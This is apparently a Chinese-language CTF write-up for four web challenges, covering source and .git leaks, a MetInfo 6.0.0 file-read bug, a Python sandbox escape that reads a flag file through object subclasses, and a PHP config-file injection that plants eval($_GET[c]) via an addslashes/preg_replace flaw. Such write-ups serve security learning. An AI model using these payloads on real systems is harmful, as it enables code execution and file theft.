这个端午好像就放了这么一个比赛
之前我还以为很简单。。意外
发现自己还是挺菜
web1
这道题首先是让你关注微信公众号,我还以为关注了就可以
进去是这样的
选择武器真滴刺激
主要的就是射击,fuzz一下就是
找辉神问了一下怎么样可以收到ping包——用tcpdump
sudo tcpdump ip proto \\icmp
网上找了一下使用tcpdump
https://www.cnblogs.com/f-ck-need-u/p/7064286.html
一直不行=。=觉得关题目了
找了腹黑要了payload
tcpdump -i venet0:0 src 139.198.3.171 -q -XX -nn -vvv
给我的payload里面有网址=。=
139.198.3.171进去之后发现有.git泄露
关题目了呜呜呜
web2
首先是www.zip泄露
这道题是Metinfo 6.0.0的新漏洞吧
总不可能找0day
上网搜索一下只在bugscan中找到一个6月5号的任意文件读取
看着告诉了我们路径我觉得没错了
上网再查一番
http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/
有这一份5-26号的!按着这个做就行
我做的时候环境关了给一份li4n0师傅的payload
web3
python的日沙箱
http://www.360zhijia.com/360anquanke/178589.html
魔法函数!就可以了
().__class__.__bases__[0].__subclasses__()
但是没有任何东西
0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")
有东西
用for循环读取一下
[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]
这样就好啦
web4
这题又给源码了
git泄露
payload
option=dfgh\';eval($_GET[c]);//
<?php
if(!isset($_GET['option'])) die();
$str = addslashes($_GET['option']);
$file = file_get_contents('./config.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('./config.php', $file);
做的时候我在本地搭了环境在线试的发现并没有过滤\(着急做题就没仔细想)
但是addslashes是过滤了\的呀
估计就是那个正则表达式的问题吧
原来是因为preg_replace的问题使得\又被转义了一次
所以单引号逃出来了
就可以了在config.php中执行任意命令了
最难的是要跑脚本了,一直上传自己的命令,跟别人抢
最后cat flag.php时候bp中不行
我是直接用firefox的
网友评论